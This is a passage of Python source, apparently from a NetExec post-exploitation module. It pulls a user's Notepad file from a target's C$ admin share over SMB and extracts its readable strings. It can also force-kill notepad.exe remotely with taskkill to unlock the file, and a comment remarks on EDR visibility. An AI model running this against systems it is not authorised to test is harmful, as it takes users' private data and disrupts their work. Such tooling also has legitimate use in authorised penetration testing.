(self, connection, context, file_path, user)
| 90 | return string not in common_garbage |
| 91 | |
def read_and_decode_file(self, connection, context, file_path, user):
    """Download ``file_path`` from the target's ``C$`` share and return its meaningful strings.

    The file is read over SMB into an in-memory buffer with
    ``connection.conn.getFile``. A ``STATUS_SHARING_VIOLATION`` is taken to
    mean that notepad.exe holds the file open on the target:

    * when ``self.kill`` is set, ``taskkill /IM notepad.exe /F`` is run on the
      target through ``connection.execute`` (this spawns a process on the
      host, which host telemetry / EDR can observe), the module waits one
      second and retries the download; a failing retry is logged at debug
      level and whatever is in the buffer is processed as usual;
    * otherwise the user is told how to enable the kill option and ``[]``
      is returned.

    Any other download error is logged at debug level and the (possibly
    empty) buffer is still processed.

    Args:
        connection: NetExec connection; ``conn`` is the SMB client and
            ``execute`` runs a command on the target.
        context: module context providing ``log``.
        file_path: path of the file relative to the ``C$`` share.
        user: user name, used only in log messages.

    Returns:
        The strings yielded by ``self.extract_strings`` for which
        ``self.is_meaningful_content`` is true.
    """
    sharing_violation = "STATUS_SHARING_VIOLATION"
    buf = BytesIO()
    try:
        connection.conn.getFile("C$", file_path, buf.write)
    except Exception as err:
        if sharing_violation not in str(err):
            # Unrelated failure: note it and fall through with whatever was received.
            context.log.debug(f"Error accessing {file_path}: {err}")
        elif not self.kill:
            context.log.fail("Notepad.exe is open on target. If want to kill process, add kill option true. (-o KILL=True)")
            return []
        else:
            # notepad.exe holds the file open; terminate it and retry the read once.
            try:
                context.log.debug(f"Trying to kill notepad.exe process for {user} user.")
                # NOTE: connection.execute spawns a process on the target; the original
                # author flagged this as EDR-visible and left an RPC-based kill as a to-do.
                connection.execute("taskkill /IM notepad.exe /F")
                time.sleep(1)  # give the target a moment before re-reading the file
                context.log.debug(f"Notepad process was successfully killed for {user}")
                connection.conn.getFile("C$", file_path, buf.write)
            except Exception as retry_err:
                context.log.debug(f"Alternative method failed: {retry_err}")

    # getvalue() yields the whole buffer regardless of the current position.
    keep = self.is_meaningful_content
    return [text for _, text in self.extract_strings(buf.getvalue()) if keep(text)]
| 123 | |
| 124 | def on_admin_login(self, context, connection): |
| 125 | self.context = context |